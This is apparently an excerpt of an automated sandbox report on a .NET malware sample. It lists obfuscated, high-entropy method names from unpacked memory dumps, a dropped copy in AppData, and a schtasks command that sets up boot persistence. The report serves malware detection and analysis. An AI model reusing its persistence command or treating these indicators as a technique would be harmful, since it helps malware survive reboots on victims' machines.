                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0042C972 pushad ; retf 12_2_0042C9B1
                    Source: g44YQtTyjN.exe | Static PE information: section name: .text entropy: 7.801835845620538
                    Source: ECmmsbHOaKPh.exe.0.dr | Static PE information: section name: .text entropy: 7.801835845620538
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, of7Q4QO6JZ92cL8skG.cs | High entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nZxLbZRMVbxYFIH9ju.cs | High entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, XQBK8nGo7LpSkIBpXkD.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, EFYsb3CWYCN3jQC6J2.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Aio5xEzmfoII3vyFUn.cs | High entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, qpHKcbx1HPcRRb4eZv.cs | High entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, bc7CIFrDHpVetg05d2.cs | High entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs | High entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, tpKlUohfpdkCkT7o9Y.cs | High entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, NtTVCc6N7Ct9aKDB26.cs | High entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Syve8TXhcAAxKpmLB6.cs | High entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, itERePonfX9tNyRiRG.cs | High entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, CFoKjxka7clapO4nEJ.cs | High entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, gBm1jOGSdUP4bMbEH8G.cs | High entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, NUuG2imYy55Q63T4jn.cs | High entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, k5AhtwGn8mQJvWh94Cv.cs | High entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, w8K33CGGhnmZMn6ODNQ.cs | High entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, H3r56utoOsfimPxpGK.cs | High entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, OhMjImvU5OtkHhWlnT.cs | High entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, hNJkaAD7i6mbUvTth2.cs | High entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.cs | High entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, maKQ0yStCWeKTLZjv6.cs | High entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Kt7WdEYHTK9vudn78X.cs | High entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, S4ZPw5HLP8SKw4yP9A.cs | High entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, of7Q4QO6JZ92cL8skG.cs | High entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nZxLbZRMVbxYFIH9ju.cs | High entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, XQBK8nGo7LpSkIBpXkD.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, EFYsb3CWYCN3jQC6J2.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Aio5xEzmfoII3vyFUn.cs | High entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, qpHKcbx1HPcRRb4eZv.cs | High entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, bc7CIFrDHpVetg05d2.cs | High entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs | High entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, tpKlUohfpdkCkT7o9Y.cs | High entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, NtTVCc6N7Ct9aKDB26.cs | High entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Syve8TXhcAAxKpmLB6.cs | High entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, itERePonfX9tNyRiRG.cs | High entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, CFoKjxka7clapO4nEJ.cs | High entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, gBm1jOGSdUP4bMbEH8G.cs | High entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, NUuG2imYy55Q63T4jn.cs | High entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, k5AhtwGn8mQJvWh94Cv.cs | High entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, w8K33CGGhnmZMn6ODNQ.cs | High entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, H3r56utoOsfimPxpGK.cs | High entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, OhMjImvU5OtkHhWlnT.cs | High entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, hNJkaAD7i6mbUvTth2.cs | High entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.cs | High entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, maKQ0yStCWeKTLZjv6.cs | High entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Kt7WdEYHTK9vudn78X.cs | High entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, S4ZPw5HLP8SKw4yP9A.cs | High entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, of7Q4QO6JZ92cL8skG.cs | High entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nZxLbZRMVbxYFIH9ju.cs | High entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, XQBK8nGo7LpSkIBpXkD.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, EFYsb3CWYCN3jQC6J2.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Aio5xEzmfoII3vyFUn.cs | High entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, qpHKcbx1HPcRRb4eZv.cs | High entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, bc7CIFrDHpVetg05d2.cs | High entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs | High entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, tpKlUohfpdkCkT7o9Y.cs | High entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, NtTVCc6N7Ct9aKDB26.cs | High entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Syve8TXhcAAxKpmLB6.cs | High entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, itERePonfX9tNyRiRG.cs | High entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, CFoKjxka7clapO4nEJ.cs | High entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, gBm1jOGSdUP4bMbEH8G.cs | High entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, NUuG2imYy55Q63T4jn.cs | High entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, k5AhtwGn8mQJvWh94Cv.cs | High entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, w8K33CGGhnmZMn6ODNQ.cs | High entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, H3r56utoOsfimPxpGK.cs | High entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, OhMjImvU5OtkHhWlnT.cs | High entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, hNJkaAD7i6mbUvTth2.cs | High entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.cs | High entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, maKQ0yStCWeKTLZjv6.cs | High entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Kt7WdEYHTK9vudn78X.cs | High entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, S4ZPw5HLP8SKw4yP9A.cs | High entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | File created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
